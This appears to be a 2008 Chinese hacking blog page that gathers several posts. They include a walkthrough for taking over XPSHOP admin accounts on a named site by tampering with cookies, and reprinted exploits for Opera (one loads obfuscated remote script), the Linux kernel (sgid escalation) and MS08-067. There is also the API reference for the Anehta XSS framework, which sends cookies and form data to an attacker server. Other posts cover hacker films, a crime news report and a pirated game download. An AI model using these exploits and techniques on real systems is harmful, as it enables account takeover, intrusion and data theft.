XPSHOP商城系统漏洞

2008年11月3日 没有评论 75 views

文章作者:121711090
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)

无意中发现这个漏洞的..官方现在还不知道...我没有在别处公布哦..
这个漏洞不好...要直拉改人家管理员密码!!有点儿缺德!!!...
但为了我们的网络更安全..还是看看吧...

首先先看看这个站吧:http://demo1.xpshop.cn/
先注册一个用户进去..为了方便也为了不要那么垃圾账户在人家系统里.我这说一下我注册好了的用户名:wc1217 密码:77423704

好..还是用啊D打开网站比较好..看截图:记得要保留cookies


之后便看看他的Cookies...

代码:

LoginCode=0684; demo1.xpshop.cnResource=zh-cn; ASP.NET_SessionId=3pxjo23zuikyrk45mx0g4a55; XpShop_CartID=0f810c00-fbbf-4984-951e-555357b14a54; demo1.xpshop.cnLogin=mid=14

我们改一下这两个值:LoginCode=0684;mid=14   .......都改成1      :

代码:

LoginCode=1; demo1.xpshop.cnResource=zh-cn; ASP.NET_SessionId=3pxjo23zuikyrk45mx0g4a55; XpShop_CartID=0f810c00-fbbf-4984-951e-555357b14a54; demo1.xpshop.cnLogin=mid=1

点击修改..后右键刷新看一下..要注意.不要刷得太快...不然就没用了..

之后就成这样了:

当然..也有可能没有..那我们就要改一下:"ASP.NET_SessionId=" 这个值就好了..随便改一个字就行:如下:

代码:

LoginCode=1; demo1.xpshop.cnResource=zh-cn; ASP.NET_SessionId=fu1q1w3g3qc2vn55naohei55; XpShop_CartID=0f810c00-fbbf-4984-951e-555357b14a54; demo1.xpshop.cnLogin=mid=1

好了..现在再看看会员信息:
是不是有一个"找回密码答案:"呵.....个位都想到了吧..直接就能改管理员密码了..
http://demo1.xpshop.cn/memberLostpass.aspx这个是改密码的..
如下图:

成功.....http://demo1.xpshop.cn/admin/default.aspx这里登录后就是怎么拿WEBSHELL了..
可是我一直没弄成..理论是只有这样才行..看..

先插马..再备份..但这里出错了..
还望达人能想出更好的办法..
我想了一晚上了....没辙了....
http://demo1.xpshop.cn/admin/ftb.imagegallery.aspx?frame=1&rif=admin&cif=admin 这可以列目录

好..就那么多了....有哪位达人弄出好办法了..千万别望了告诉我呀...联系方式:http://blog.sina.com.cn/qq1217

http://demo1.xpshop.cn/helps/t.txt

添加flash广告处可直接上传马

营销管理 - flash广告添加

分类: 技术文章 标签:

MS08-067网马

2008年11月2日 没有评论 116 views

已经出来有一周了,很多人还在忙着编译,放个可以做网马的exploit出来。
又一场腥风血雨

#include 

// This is the decompiled function sub_5B86A51B in netapi32.dll on XP SP3

int ms08_067(wchar_t* path)
{
wchar_t* p;
wchar_t* q;
wchar_t* previous_slash = NULL;
wchar_t* current_slash = NULL;
wchar_t ch;

// If the path starts with a server name, skip it

if ((path[0] == L'\\' || path[0] == L'/') &&
(path[1] == L'\\' || path[1] == L'/'))
{
p = path+2;

while (*p != L'\\' || *p != L'/') {
if (*p == L'\0')
return 0;
p++;
}

p++;

// make path point after the server name

path = p;

// make sure the server name is followed by a single slash

if (path[0] == L'\\' || path[0] == L'/')
return 0;
}

if (path[0] == L'\0') // return if the path is empty
return 1;

// Iterate through the path and canonicalize ..\ and .\

p = path;

while (1) {
if (*p == L'\\') {
// we have a slash

if (current_slash == p-1) // don't allow consequtive slashes
return 0;

// store the locations of the current and previous slashes

previous_slash = current_slash;
current_slash = p;
}
else if (*p == L'.' && (current_slash == p-1 || p == path)) {
// we have \. or ^.

if (p[1] == L'.' && (p[2] == L'\\' || p[2] == L'\0')) {
// we have a \..\, \..$, ^..\ or ^..$ sequence

if (previous_slash == NULL)
return 0;

// example: aaa\bbb\..\ccc
// ^ ^ ^
// | | &p[2]
// | |
// | current_slash
// |
// previous_slash

ch = p[2];

wcscpy(previous_slash, &p[2]);

if (ch == L'\0')
return 1;

current_slash = previous_slash;
p = previous_slash;

// find the slash before p

// BUG: if previous_slash points to the beginning of the
// string, we'll go beyond the start of the buffer
//
// example string: \a\..\

q = p-1;

while (*q != L'\\' && q != path)
q--;

if (*p == L'\\')
previous_slash = q;
else
previous_slash = NULL;
}
else if (p[1] == L'\\') {
// we have \.\ or ^.\

if (current_slash != NULL) {
wcscpy(current_slash, &p[1]);
goto end_of_loop;
}
else { // current_slash == NULL
wcscpy(p, p+2);
goto end_of_loop;
}
}
else if (p[1] != L'\0') {
// we have \. or ^. followed by some other char

if (current_slash != NULL) {
p = current_slash;
}
*p = L'\0';
return 1;
}
}

p++;

end_of_loop:
if (*p == L'\0')
return 1;
}
}

// Run this program to simulate the MS08-067 vulnerability

int main()
{
return ms08_067(L"\\a\\..\\");

分类: 矩阵毒刺 标签: ,

Opera 9.62 (opera:allinone) Remote Code Execution Exploit PoC

2008年11月2日 2 条评论 106 views

Opera 9.62 (opera:allinone) Remote Code Execution Exploit PoC

<!--
# OPERA 9.62 Remote Code Execution
# Vulnerability Found By NeoCoderz
# Email : NeoCoderz1[at]msn[dot]com
-->
<html>
<script>
function execcalc() {
  var abc="c:\\\\windows\\\\system32\\\\calc.exe";
  window.open('opera:config?q=q=%2A"><img src=\'x\' onerror=\'eval(abc)\'>&p=1&s=1');
  window.setTimeout("location.href='mailto:'",4000);
}
</script>
<body scrolling="no">
<a href="#" onclick="execcalc()">Click me...(opera:config)</a><br>
<script>
function execcalca() {
  var abc="c:\\\\windows\\\\system32\\\\calc.exe";
  window.open('opera:cache?q=%2A"><img src=\'x\' onerror=\'eval(abc)\'>&p=1&s=1');
  window.setTimeout("location.href='mailto:'",4000);
}
</script>
<body scrolling="no">
<a href="#" onclick="execcalca()">Click me...(opera:cache)</a><br>
<script>
function execcalcb() {
  var abc="c:\\\\windows\\\\system32\\\\calc.exe";
  window.open('opera:debug?q=q=%2A"><img src=\'x\' onerror=\'eval(abc)\'>&p=1&s=1');
  window.setTimeout("location.href='mailto:'",4000);
}
</script>
<body scrolling="no">
<a href="#" onclick="execcalcb()">Click me...(opera:debug)</a><br>
<script>
function execcalcc() {
  var abc="c:\\\\windows\\\\system32\\\\calc.exe";
  window.open('opera:plugins?q=%2A"><img src=\'x\' onerror=\'eval(abc)\'>&p=1&s=1');
  window.setTimeout("location.href='mailto:'",4000);
}
</script>
<body scrolling="no">
<a href="#" onclick="execcalcc()">Click me...(opera:plugins)</a><br>
<script>
function execcalcd() {
  var abc="c:\\\\windows\\\\system32\\\\calc.exe";
  window.open('opera:about?q=%2A"><img src=\'x\' onerror=\'eval(abc)\'>&p=1&s=1');
  window.setTimeout("location.href='mailto:'",4000);
}
</script>
<body scrolling="no">
<a href="#" onclick="execcalcd()">Click me...(opera:about)</a><br>
</html>

# milw0rm.com [2008-10-30]

分类: 矩阵毒刺 标签: ,

Opera 9.61 opera:historysearch Code Execution Exploit PoC

2008年11月2日 没有评论 60 views

Opera 9.61 opera:historysearch Code Execution Exploit PoC

<!--
--Aviv.

http://aviv.raffon.net/2008/10/30/AdifferentOpera.aspx
-->

<html>
<script>
function x() {
  window.open('opera:historysearch?q=%2A"><img src=\'x\' onerror=\'eval(String.fromCharCode(113,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,83,67,82,73,80,84,34,41,59,113,46,115,114,99,61,34,104,116,116,112,58,47,47,119,119,119,46,114,97,102,102,111,110,46,110,101,116,47,114,101,115,101,97,114,99,104,47,111,112,101,114,97,47,104,105,115,116,111,114,121,47,111,46,106,115,34,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,113,41,59))\'>&p=1&s=1');
  window.setTimeout("location.href='mailto:'",4000);
}
</script>
<body scrolling="no">
<a href="#" onclick="x()">Click me...</a>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />

<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />

<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />

<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />

<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />

<br />
<br />
<br />
<br />
<br />
<br />
<br />
<img src='x' onerror='eval(String.fromCharCode(113,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,83,67,82,73,80,84,34,41,59,113,46,115,114,99,61,34,104,116,116,112,58,47,47,119,119,119,46,114,97,102,102,111,110,46,110,101,116,47,114,101,115,101,97,114,99,104,47,111,112,101,114,97,47,104,105,115,116,111,114,121,47,111,46,106,115,34,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,113,41,59))'>
</body>
</html>

# milw0rm.com [2008-10-30]

分类: 矩阵毒刺 标签: ,

Linux Kernel < 2.6.22 ftruncate()/open() Local Exploit

2008年11月2日 没有评论 104 views

/*
gw-ftrex.c:

Linux kernel < 2.6.22 open/ftruncate local exploit
by <gat3way at gat3way dot eu>

bug information:
http://osvdb.org/49081

!!!This is for educational purposes only!!!

To use it, you've got to find a sgid directory you've got
permissions to write into (obviously world-writable), e.g:
find / -perm -2000 -type d 2>/dev/null|xargs ls -ld|grep "rwx"
which fortunately is not common those days :)
And also a shell that does not drop sgid privs upon execution (like ash/sash).
E.g:

test:/fileserver/samba$ ls -ld
drwxrwsrwx 2 root root 4096 2008-10-27 16:27.
test:/fileserver/samba$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
test:/fileserver/samba$ /tmp/gw-ftrex
ash shell found!
size=80200
We're evil evil evil!

$ id
uid=33(www-data) gid=33(www-data) egid=0(root) groups=33(www-data)

Trqbva da kaja neshto umno kato zakliuchenie...ma sega ne moga da se setia.
*/

#include <unistd.h>
#include <sys/types.h>
#include <sys/mman.h>
#include <fcntl.h>

int main(int argc, char *argv[])
{
char *buf=malloc(3096*1024); //3mb just to be sure
int a,len;
int fd,fd1;
char *buf1;
int shell=0;

if (stat("/bin/ash",buf)==0)
{
    printf("ash shell found!\n");
    shell=1;
}

if (shell==0) if (stat("/bin/sash",buf)==0)
{
    printf("sash shell found!\n");
    shell=1;
}

if (shell==0)
{
    printf("no suitable shell found (one that does not drop sgid permissions) :(\n");
    exit(2);
}

len=0;
if (shell==1) fd=open("/bin/ash",O_RDONLY);
if (shell==2) fd=open("/bin/sash",O_RDONLY);

while (read(fd,buf+len,1)) len++;

printf("size=%d\n",len);
fd1=open(".evilsploit",O_RDWR | O_CREAT | O_EXCL, 02750);
ftruncate(fd1, len);
buf1 = mmap(NULL, len, PROT_WRITE | PROT_EXEC, MAP_SHARED, fd1, 0);
memcpy(buf1,buf,len); 
munmap(buf1,len);
close(fd1);close(fd);
free(buf);
printf("We're evil evil evil!\n\n");
execv(".evilsploit", NULL);
}

// milw0rm.com [2008-10-27]

分类: 矩阵毒刺 标签: ,

十部必看的黑客电影

2008年11月2日 没有评论 68 views

1.《战争游戏》WarGames(1983)

1983年,电影《战争游戏》开黑客影片先河。故事发生在里根总统任期,当时正值冷战高峰。苹果Mac机尚未诞生,电脑还只是科学怪才专属玩具,影片用大众对核战争和未知新科技的恐惧好好地把观众吓了一把。影片主角是名叫大卫·莱特曼的电脑天才,可自由进入学校电脑系统改动考试分数,因此全无学业之忧,整日将时间耗在电子游戏上。一日误撞上了“北美空防系统”(NORAD)的一台超级电脑,大卫用它玩起了“第三次世界大战”的模拟游戏,他不知道的是,这个游戏比他想象的要来得真实:当大卫退出,游戏并没有结束,NORAD的电脑仍然认为苏联人发动了核战争,对两个超级大国的电脑而言,战争游戏并没有结束……
 

2.《通天神偷》 Sneakers(1992)

《通天神偷》讲述的是一群代号SNEAKERS的“合法黑客”的故事。SNEAKERS是精通电脑的工业间谍,银行、政府机关等重要机构出钱请他们“黑”自己的电脑系统,以此检测系统的安全性。比肖普是这伙人的头,沉默,低调,有一段不太见得光的过去,典型的黑客。

一日,一个政府机构找上门,要求比肖普的人在网上盗取一个电脑软件,拥有它便可以开启全球所有的秘密电脑资源。拒绝是不可能的,因为它掌握了比肖普一干人过去所有的秘密。真正的幕后大坏蛋是国际头号科技罪犯Cosmo,他伙同政府内的腐败分子将比肖普一群人“逼上绝路”……
 

 

3.《异度空间》THE LAWNMOWER MAN (1992)

《异度空间》是第一部建立在虚拟空间的影片。约伯·史密斯是一个智力只有儿童水平的割草人,他定期为劳伦斯·安吉洛博士修剪草坪。安吉洛效力于一家政府秘密机构,负责为军队训练高智能大猩猩。安吉洛与机构的合作出了问题,智障的约伯吸引了他的注意力。他决心以约伯为实验对象,把他的智力恢复到正常水平。实验结果好得出乎意料:约伯成了这个星球上最聪明的人。而他的潜能还在不断发展,慢慢地他变成了某种非人的异类……
 

 

4.《网络惊魂1.0》 The Net(1995)

电脑奇才安吉拉·贝内特专门研究电脑程序中的各种病毒。她隐居在加利福尼亚过着与人无交往的生活。因为无意中收到记录有黑客犯罪证据的软盘,她掉入了敌人设下的陷阱:出国旅游,碰上的美男原来是杀手;她回到家发现车丢了,房子被出卖,而她也被指控为罪犯……
安吉拉开始反击,她通过网络发现一群自称“禁卫军”的电脑罪犯控制了卡萨德拉尔软件公司,他们卖出数据保护程序并实际设下埋伏,从而对所有客户的系统进行复制。安吉拉冒险打入卡萨德拉尔软件公司,发现自己原来的身份已被一名“禁卫军”所顶替。她在后来的一次电脑交易会上联机上网,用一种特殊的电脑病毒摧毁了 “禁卫军”的数据库。
 

 

5.《第十三层》TheThirteenth Floor(1999)

故事开始在1937年的洛杉矶,哈蒙德·富勒在与情人幽会后回到酒店,他给某人留下一封信后,赶回家见妻子。当他躺倒在床上,突然时空转换到了1999年的洛杉矶……
在洛杉矶一个商业区的第13层办公楼上,道格拉斯·霍尔和哈南·富勒创造了一个虚拟的1937年代洛杉矶。某日,霍尔一觉醒来发现哈南死了,自己成了头号嫌疑犯。
霍尔无法回忆起是否参与了谋杀,为了弄清真相,他往返于现实和1937年的虚拟世界,这种双重生活使霍尔在现实世界的存在变得日益模糊……富勒在死亡之前似乎也被牵扯进类似双重生活。神秘的美女简的出现更加使现实和虚幻世界的界限模糊起来。

 

6.《黑客》Hackers(1995)

绰号“零度冷”的戴德·墨菲是黑客中的传奇人物。1988年,他单枪匹马弄瘫了华尔街的1507台电脑,导致全球金融危机。11岁的戴德因此在联邦调查局的档案中挂上了名,并被禁用键盘直到18岁生日。7年未碰一个数码……戴德充满饥渴。
绰号“酸蚀”的凯特·利比是一名在信息高速公路上横行无阻的女黑客。当“零度冷”和“酸蚀”相遇,一场不可避免的两性大战在硬驱上展开。此时“瘟疫”,一名发受雇于跨国公司的黑客高手出现了,他不但想借网络欺诈数百万美元还想嫁祸戴德、凯特和他们的朋友。为洗脱罪名,戴德、凯特招募了一帮黑客高手加入他们对大公司阴谋的反击战

 

7.《杀人硬件》Virtuosity 1995

1999年,洛杉矶,政府执法技术中心开发出用于训练警探的模拟机原型。这种虚拟现实模拟机装载有最先进人工智能技术,使用者需追捕电脑生成罪犯席德 6.7(结合人类所有邪恶),以锻炼他们的侦探技巧。但是,这个复杂的“猫捉老鼠”系统有一个致命的后果:狡猾的席德6.7摆脱束缚离开了虚拟空间,进入现实世界作恶。前警察帕克·巴恩斯被认为是最有机会制服席德6.7的人。
在犯罪行为专家卡特的帮助下,巴恩斯必须穿梭于现实和虚拟世界,在新千年之前抓住席德。同时,巴恩斯在席德6.7身上发现了杀害他的妻子和女儿的变态杀手的影子。这场猎人的游戏变得复杂起来,赌注也更加高昂。
 

 

8.《约翰尼记忆术》 Johnny Mnemonic (1995)

2021年,世界出现巨大的电脑网络。大半的人类都死于电子设备发出的电磁波产生的环境污染。信息成为最昂贵的商品,黑客猖獗,因此最宝贵的信息必须通过人类大脑传送。
约翰尼就是这样一个负责信息传递的专业人士。一次,约翰尼受雇于两名从世界第三大跨国公司Pharmkom叛逃的科学家,为他们传递无价数据。
约翰尼大脑中的记忆芯片无法承受超负荷的上载,如果不及时找到解压密码下载信息,他将死亡。此外,Pharmkom雇用了世界最大的犯罪集团Yakuza,要取约翰尼的人头,以追回无价信息。
 

 

9.《黑客帝国》The Matrix(1999)

被名为“矩阵”的计算机人工智能系统控制者的人们就像它放牧的动物一样。黑客尼奥在网络上查找关于“矩阵”的一切。
在一名神秘女郎特蕾妮的引导下见到了黑客组织的首领摩菲斯,三人一起走上了抗争“矩阵”的征途。
尼奥面对着另外一个问题:他就是它吗?虽然不知道为什么,尼奥的答案就是“不是”。摩菲斯的朋友塞弗同意他的观点。而其他人则不那么肯定。另外,还有人在保护“矩阵”,冷酷的史密斯探员一伙掌握着令人震惊的秘密。
尼奥、默菲和特莱妮必须用他们的生命对抗强大的敌人来追寻答案、寻找自我。他们的每一步都是危机四伏……
 

 

10.《剑鱼行动》Swordfish(2001)

加布利尔·希尔是个在江湖上闯荡多年的间谍特工,他妄想建立一个属于自己的极端爱国主义组织。为了筹集这个组织招兵买马所需资金,加布利尔决定冒险闯入网络空间,窃取一笔高达几十亿美金的基金。希尔需要一个顶尖电脑黑客的帮助。他盯上了斯坦利·吉森。
斯坦利曾是世界上两个最顶尖的电脑黑客之一,他将FBI计算机监视系统搞了个天翻地覆,当然他也为此坐了牢。现在他住在一个破拖车里,老婆和他离了婚,带着小女儿霍莉嫁给了专拍色情片的大老板。加布利尔来请斯坦利出山,答应得手后帮斯坦利重获女儿的监护权。斯坦利答应铤而走险,他成了一颗身不由己的棋子……

 

分类: 影音娱乐 标签: ,

大学生黑客攻击政府网站牟利 两个月赚200多万

2008年11月2日 2 条评论 53 views

2008年9月27日,江西警方以涉嫌破坏计算机信息系统罪,将李士扬、王晓娃等6名犯罪嫌疑人向人民检察院移交起诉;南昌市经济开发区人民检察院以“涉嫌伪造公文罪”批准对李汶民等犯罪嫌疑人逮捕.此前的6月6日,江西省卫生厅考试中心向江西省公安厅公共信息网络安全监察总队报案称,他们的网站数据库被人篡改,有人借此造假、牟取暴利.李士扬、王晓娃等最终被锁定为此案的嫌疑人.

假证可以通过政府网上验证

5月15日,江西省卫生厅医政处收到一署名“张美娟”的信访件,她反映“有人用真医师资格证来骗人”.

5月6日,张美娟在一个QQ群里看到有人留下的一条信息:可以办理真的《医师资格证》和文凭学历,且保证在省卫生厅网上可以查到注册记录.

张美娟通过其留下的联系方法很快联系上了对方,商量办证的事宜.她如实告诉对方,自己并不具备医学方面的知识,对方说没关系.他们很快约定办成后付2000元.5月7日,张美娟果真在江西省卫生厅的网上查到了以自己姓名注册的医师资格相关信息.于是,她按先前的约定,将2000元打入对方提供的账号上.

然而,付款一周后,张美娟上网却发现原先以自己姓名注册的医师资格记录不见了.

6月2日,远在浙江省的温岭县卫生部门也来电反映,他们在办理《行医许可证》的过程中,发现有人持存在瑕疵的《医师资格证书》来申请办证.该证书是江西省卫生厅核发的,可是查询网上的数据库,却显示确有其人.他们已经陆续扣下了10本这样的证书,请求江西省卫生厅核实这些证书的真伪.

截至6月5日, 江西省卫生厅接到了10多个类似的查询电话、信函.

对于骤然出现的这种现象,卫生厅怀疑其用于发布国家医师资格考试合格人员的网站被他人非法操作,有人通过篡改数据库内容的方法,制作虚假《医师资格证书》牟利……遂决定向公安机关报案.

办案民警了解到,获得《医师资格证书》主要有两种途径:一是通过国家考试;二是在《中华人民共和国执业医师法》颁布之前已经取得有效职称的人,经国家进行认定,由省级卫生行政部门颁发《医师资格证书》.国家每年都会组织医师资格考试,考试合格人员方可取得《医师资格证书》.持有这个证书的人,就可以向县以上卫生行政部门申请医师执业注册,最终取得国家许可的行医执业权.

卫生部医师资格考试中心每年都是在2月份将上一年通过了医师资格考试的人员数据,通过光盘或网上下载,发至各省、市(自治区),由各地将该数据导入到卫生部配发的医师资格信息管理系统中,用该系统将数据导出为TXT格式文件,再使用相关软件将其转换成access格式的数据库,由省政府信息中心发布到卫生厅的网站上.整个工作流程严谨,有专人负责管理,从不对外开放.

要实施作案一般有两种途径:一是内部人员与外部勾结作案;二是有黑客入侵网站.

多个省份政府网站数据被修改

办案民警通过对网站工作人员调查,查看了网站服务器工作日志,检查了网络设备运转情况,初步排除了内部人员作案的嫌疑.

6月19日,江西省公安厅公共信息网络安全监察总队正式立案侦查.民警通过对被攻击受控制服务器的现场勘验,发现黑客自3月26日起入侵江西省卫生厅网站,篡改了数据库,并植入了一个木马程序(在网站预留了后门),以实现对服务器的管理控制权限.经查,黑客是利用上海、北京、香港和新加坡等地的 IP地址将篡改了的数据上传,手段非常隐蔽,具有较高的反侦查意识.

办案民警经过几个昼夜的艰苦侦查,终于将黑客在网上的其他虚拟身份锁定,并最终锁定了犯罪嫌疑人上网的地点.

6月24日凌晨,抓捕行动开始.民警秘密控制了南昌市育新路的某出租屋,当场抓获犯罪嫌疑人李士扬及同伙5名,缴获作案用的笔记本电脑、打印机、各类银行卡、虚假身份证、虚假空白医师资格证书、医师执业证书、建筑师说明书等.随后,民警又在武汉市将另一名主要犯罪嫌疑人王晓娃抓获归案.

警方共抓获10名涉案犯罪嫌疑人.据警方查实,他们先后入侵了江西省卫生厅、湖北省卫生厅、贵州省人事厅、四川省人事厅、江苏省教育厅、辽宁省建设厅、湖北省荆州市人事局等11个网站,修改相关数据700余个.

警方很快揭开了这起网络犯罪的内幕.

犯罪团伙利用黑客技术攻击政府部门网站,篡改数据库资料,然后伪造、制售假证,造成证书上网可查的假相,从中牟取暴利.犯罪嫌疑人李士扬在疑犯王晓娃、刘晓卫(北京人,在逃)的协助下,入侵网站——修改数据库——办理假证——贩卖假证——使用假证——办理从业许可证等,通过网络编织了一个入侵政府网站、制假贩假、非法牟取暴利的松散性犯罪团伙.

两个月牟利达200多万元

那么,这些黑客都是些什么人呢?

李士扬,24岁,江西省余干县人,2004年考入江西某大学计算机专业,家境贫困,因而特别留心赚钱的机会.他从帮助一些大中专院校“代理招生 ”赚取佣金开始,逐渐把目光瞄准了四、六级英语考试成绩合格证、自学考试毕业证,最后发展到与女友胡姚艳一道,买来电脑、激光打印机,靠制贩假证牟取暴利.

2007年下半年,李士扬发现网上要求办理《医师资格证书》及毕业证书的信息非常多.面对这些很容易被忽略的信息,李士扬从中看到了发财机会.接着,他便苦苦寻找方法:如何让假证的相关信息上传到网站的数据库.

为了攻克这个难题,李士扬买了有关黑客方面的书籍,上网浏览黑客技术发展的信息,参加有关黑客知识的网上论坛.但他始终没有掌握攻克入侵网站的技术.2008年3月,李士扬以“鸟人”的网名在“黑客工作室”发帖子,公开招募一个可以植入木马的黑客帮手,以便入侵网站,修改数据库文件.帖子只发出几个小时,武汉某软件系统有限公司的王晓娃便“揭榜”了.

25岁的王晓娃,毕业于湖北某师范大学计算机科学技术与应用专业.李士扬要求王入侵一些网站,在取得使用权限后交与自己使用,同时答应每开一个 “后门”给其5000元.王晓娃见有利可图,便跃跃欲试,但他技术欠佳,还不能胜任这样的工作.他便在“幻影论坛”上发出了招募黑客的帖子.

于是,北京网名叫“小偷快跑”的刘晓卫出现了.王晓娃通过MSN与刘晓卫联系上后,便以每开一个“后门”2700元的价格成交,他从中赚取差价.王晓娃拿出从李士扬那里得到的“订单”:先攻湖北省卫生厅、江西省卫生厅的两个网站.

不到三天时间,刘晓卫便攻下了这两个网站.他把开设好的“后门”地址代码发给王晓娃后,王晓娃通过登录这两个网站,弄清网站网络结构、使用程序后,编写了网站服务器数据库的操作使用手册,与地址一道发给了李士扬.李士扬便可以自由登录这两个网站,任意添加、修改数据.

接着,他们又入侵了贵州省人事厅、四川省人事厅、江苏省教育厅、辽宁省建设厅、湖北

分类: 业界资讯 标签:

《命令与征服:红色警戒3》破解版下载

2008年10月31日 没有评论 61 views

红色警戒 3故事描述强大的苏俄军队节节败退,盟军准备一举攻入克里姆林宫,库可夫将军以及查丹科上校决心孤注一掷,使用了未经测试的秘密武器:俄军时空机器;结果,他们改写了历史,在总理查丹科的领导下,让盟军濒临战败边缘,但他们却意外发现,昇阳帝国悄悄地坐大,神圣的天皇芳朗选择在此时刻发动攻击。当天皇的帝国军队带来了巨大威胁,准备将俄军和盟军从地球上消灭殆尽……从这一刻起,世界的发展全然掌握在玩家的手里,当盟军、俄军与昇阳帝国三大阵营在玩家眼前,玩家该如何抉择?无论选择投身任一阵营,都将写下历史新页。

中文名称:命令与征服:红色警戒3
英文名称:Command & Conquer: Red Alert 3
资源类型:ISO
版本:破解版
发行时间:2008年
制作发行:EA Games
     Electronic Arts
地区:美国
语言:英语
简介

user posted image

user posted image

user posted image

user posted image

user posted image

游戏配置:

操作系统:Windows XP/Vista 32-bit(不支持64-bit)
处理器:XP 2.0GHz;Vista 2.2GHz(Pentium 4、Athlon XP 2000+);支持多核
内存:1GB
硬盘:Media 6GB;EA Link 12GB
显卡:GeForce 6800或Radeon X1800、兼容DirectX 9.0c
声卡:兼容DirectX 9.0c(创新Sound Blaster Audigy在Vista下需要P4 2.6GHz;不支持Yamaha Xwave-512) 
输入:键盘、鼠标

游戏简介:《红色警戒 3》故事描述强大的苏俄军队节节败退,盟军准备一举攻入克里姆林宫,库可夫将军以及查丹科上校决心孤注一掷,使用了未经测试的秘密武器:俄军时空机器;结果,他们改写了历史,在总理查丹科的领导下,让盟军濒临战败边缘,但他们却意外发现,昇阳帝国悄悄地坐大,神圣的天皇芳朗选择在此时刻发动攻击。当天皇的帝国军队带来了巨大威胁,准备将俄军和盟军从地球上消灭殆尽……从这一刻起,世界的发展全然掌握在玩家的手里,当盟军、俄军与昇阳帝国三大阵营在玩家眼前,玩家该如何抉择?无论选择投身任一阵营,都将写下历史新页。
 

 

下载地址:电驴地址
 

分类: 影音娱乐 标签: ,

MS08-067 check

2008年10月31日 没有评论 73 views

This tool can be used to anonymously check if a target machine or a list of target machines are affected by MS08-067 (Vulnerability in Server Service Could Allow Remote Code Execution)

Usage
$ python ms08-067_check.py -h
Usage: ms08-067_check.py [-d] {-t |-l }

Options:
--version show program's version number and exit
-h, --help show this help message and exit
-d show description and exit
-t TARGET target IP or hostname
-l LIST text file with list of targets
-s be silent

Example
$ python ms08-067_check.py -t 192.168.123.30
192.168.123.30: VULNERABLE

下载地址:ms08-067_check.py
 

分类: 资源共享 标签:

Anehta -- API速查手册

2008年10月31日 没有评论 96 views

作者:

这本是下个版本里的help()函数功能,现在单独拿出来做一个速查手册。

个别API包括在下一个版本中。

Anehta core API Help:
anehta.core.freeze(ms); //freeze current page during the time(ms)

anehtaCache.addItem(Key, Value); //add a key to cache; return Value;

anehtaCache.removeItem(Key); //remove value of the key; return the value of the removed key;

anehtaCache.dropItem(Key); //delete the key in the cache; return true/false;

anehtaCache.getItem(Key); //get the value of the key; return the value;

anehtaCache.setItem(Key, Value); //change the value of the key;if key not exist, add one;

anehtaCache.appendItem(Key, Value); //append value to the specific key;

anehtaCache.hasItem(Key); //test if the key exist;

anehtaCache.showKeys(); //alert all keys in the cache;

anehtaCache.clone(); //clone a cache object; return the cloned object;

anehtaCache.clear(); //empty the cache;

anehta.core.setWatermark(flashID, value); //set the value as the flash cookie; invoke the flashID's callback

anehta.core.getWatermark(flashID); //get the value of the flash cookie; invoke the flashID's callback

Anehta dom API Help:
anehta.dom.getDocument(targetwindow); //return the document object of the target window

anehta.dom.addCookie(cookiename,value); //add a 'name=value;' to current cookies; return true/false

anehta.dom.checkCookie(cookiename); //check if current cookies contain a cookie named 'cookiename'; return true/false

anehta.dom.getCookie(cookiename); //get the cookiename's value from current cookies; return the value of cookiename

anehta.dom.setCookie(cookiename,value); //change the value of cookiename; return true/false

anehta.dom.delCookie(cookiename); //expire the cookiename from current cookies; return true/false

anehta.dom.persistCookie(cookiename); //make the cookiename never expired; return true/false

anehta.dom.getQueryStr(qstrname); //get the value of the qstrname from current uri; return the param's value

Anehta net API Help:
anehta.net.getURL(targeturl); //create an image element and GET the targeturl once as an img src

anehta.net.postForm(targeturl); //create a form element and POST to the targeturl, current page will be redirected

anehta.net.postFormIntoIframe(iframe, targeturl, postdata); //create a form element and POST with the postdata to the targeturl inside the iframe, current page won't be redirected

anehta.net.cssGet(targeturl); //create a style element and IMPORT the targeturl;this will make a GET request.

Anehta logger API Help:
anehta.logger.logInfo(param); //send param as querystrings to the anehta server by getURL() function;plain text transfer

anehta.logger.logCookie(); //get watermark, cookie, current uri, and send them to the anehta server by getURL() function; base64 encoded

anehta.logger.logForm(form); //get all the inputs value of the specific form and send them to the anehta server by getURL() function; base64 encoded

anehta.logger.logCache(); //check the cache data in every 5 seconds,if cache data changed,send them to the anehta server by postFormIntoIframe() function; plain text transfer

Anehta ajax API Help:
anehtaXmlHttp.init(); //initial the ajax;you must call this function before your ajax request

anehta.ajax.post(url, postdata); //ajax post; save response in cache as 'ajaxPostResponseHeaders' and 'ajaxPostResponse

anehta.ajax.get(url); //ajax get; save response in cache as 'ajaxGetResponseHeaders' and 'ajaxGetResponse

Anehta inject API Help:
anehta.inject.injectScript(url); //create a script element with the 'url' as the src attribute and append it to body

anehta.inject.removeScript(s); //remove the specific script s from body

anehta.inject.addScript(url); //add a script with the 'url' as the src attribute by a document.write() method

anehta.inject.injectCSS(url); //create a link element with the 'url' as the href attribute

anehta.inject.injectIframe(url); //create a hidden iframe point to the specific url and append to body

anehta.inject.addIframe(url); //create a div element and set its innerHTML as a hidden iframe which points to the specific url

anehta.inject.createIframe(w); //create a hidden iframe under the specific window 'w'; return the iframe

anehta.inject.injectScriptIntoIframe(f, proc); //write javascripts 'proc' to the specific iframe 'f'.

anehta.inject.injectFlash(flashId, flashSrc, flashParam); //create a div and inject a flash into it;

anehtaHook.hook('fnhooked', 'savedfn', 'fn'); //hook the fnhooked() function with fn() function; the original function will be save as savedfn().

